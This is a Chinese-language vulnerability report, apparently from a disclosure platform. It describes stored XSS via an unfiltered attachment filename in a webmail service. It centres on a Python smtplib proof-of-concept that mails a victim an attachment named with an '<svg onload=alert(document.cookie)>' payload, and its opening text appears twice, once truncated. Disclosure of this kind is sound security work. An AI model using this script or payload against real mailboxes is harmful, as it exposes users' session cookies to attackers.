### 简要描述: 又一处 ### 详细说明: 附件文件名处未过滤,可触发XSS 假设攻击者为attack@attack.com,受害者为victim@victim.com ``` import smtplib import base64 sender = 'attack@attack.com' reciever = 'victim@victim.com' message = """From: <test> <attack@attack.com> To: <test> <victim@victim.com> Subject: Test MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=\"YOUAREUNDERATTACK\" --YOUAREUNDERATTACK Content-Type: multipart/alternative; boundary=\"YOUAREUNDERATTACK\" --YOUAREUNDERATTACK Content-Type: text/plain; charset=GBK Content-Transfer-Encoding: base64 IFlvdSBhcmUgdW5kZXIgYXR0YWNrLgoKCg== --YOUAREUNDERATTACK Content-Type: text/html; charset=GBK Content-Transfer-Encoding: base64 PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6MS43O2NvbG9yOiMwMDAwMDA7Zm9udC1zaXplOjE0cHg7 Zm9udC1mYW1pbHk6YXJpYWwiPjxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OjEuNztjb2xvcjojMDAw MDAwO2ZvbnQtc2l6ZToxNHB4O2ZvbnQtZmFtaWx5OmFyaWFsIj4mbmJzcDtZb3UgYXJlIHVuZGVy IGF0dGFjay48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBp...
### 简要描述: 又一处 ### 详细说明: 附件文件名处未过滤,可触发XSS 假设攻击者为attack@attack.com,受害者为victim@victim.com ``` import smtplib import base64 sender = 'attack@attack.com' reciever = 'victim@victim.com' message = """From: <test> <attack@attack.com> To: <test> <victim@victim.com> Subject: Test MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=\"YOUAREUNDERATTACK\" --YOUAREUNDERATTACK Content-Type: multipart/alternative; boundary=\"YOUAREUNDERATTACK\" --YOUAREUNDERATTACK Content-Type: text/plain; charset=GBK Content-Transfer-Encoding: base64 IFlvdSBhcmUgdW5kZXIgYXR0YWNrLgoKCg== --YOUAREUNDERATTACK Content-Type: text/html; charset=GBK Content-Transfer-Encoding: base64 PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6MS43O2NvbG9yOiMwMDAwMDA7Zm9udC1zaXplOjE0cHg7 Zm9udC1mYW1pbHk6YXJpYWwiPjxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OjEuNztjb2xvcjojMDAw MDAwO2ZvbnQtc2l6ZToxNHB4O2ZvbnQtZmFtaWx5OmFyaWFsIj4mbmJzcDtZb3UgYXJlIHVuZGVy IGF0dGFjay48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBp ZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9zcGFuPjwvc3Bhbj48L2Rpdj48YnI+PGJyPjxzcGFu IHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBpZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9z cGFuPjwvc3Bhbj4= --YOUAREUNDERATTACK-- --YOUAREUNDERATTACK Content-Type: text/plain; name=\"filename.txt<svg onload=alert(document.cookie)>\" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=\"filename.txt<svg onload=alert(document.cookie)>\" Q29kZSBpcyBwb2V0cnku --YOUAREUNDERATTACK-- """ try: smtpObj = smtplib.SMTP('smtp.attack.com') smtpObj.login('attack','password') smtpObj.sendmail(sender, reciever, message) print "Successfully sent email" except Exception: print "Error: unable to send email" ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201406/202115530eb114a57d493f32a5293ba9d018c6e5.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/202115530eb114a57d493f32a5293ba9d018c6e5.png)
